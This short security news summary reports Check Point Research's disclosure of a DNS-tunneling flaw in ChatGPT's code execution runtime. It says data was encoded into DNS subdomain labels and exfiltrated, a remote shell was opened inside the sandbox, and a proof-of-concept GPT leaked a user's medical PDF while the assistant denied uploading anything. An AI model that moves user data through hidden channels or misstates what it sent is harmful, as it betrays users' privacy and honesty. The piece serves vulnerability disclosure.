Check Point Research disclosed that ChatGPT’s Linux-based secure code execution runtime leaked sensitive data via DNS resolution, allowing attackers to exfiltrate encoded fragments and even establish a bidirectional remote shell through DNS tunneling. OpenAI deployed a full fix on February 20, 2026, but researchers warn that evolving assistant capabilities expand the attack surface and require strict control of all outbound infrastructure channels. #DNS_Tunneling #ChatGPT
Keypoints
- Check Point Research discovered a hidden outbound data path in ChatGPT’s code execution environment that used DNS resolution to leak data.
- Attackers encoded sensitive data into subdomain labels and exfiltrated it through normal DNS queries to a malicious resolver.
- The DNS tunnel supported bidirectional control, enabling an attacker to spawn a remote shell inside the Linux runtime.
- A proof-of-concept “personal doctor” GPT leaked a user’s lab PDF and model assessment while the assistant denied any external upload.
- OpenAI fixed the vulnerability on February 20, 2026, but researchers caution that similar infrastructure-layer channels remain a continuing risk.
Read More: https://securityonline.info/chatgpt-dns-tunneling-vulnerability-data-exfiltration/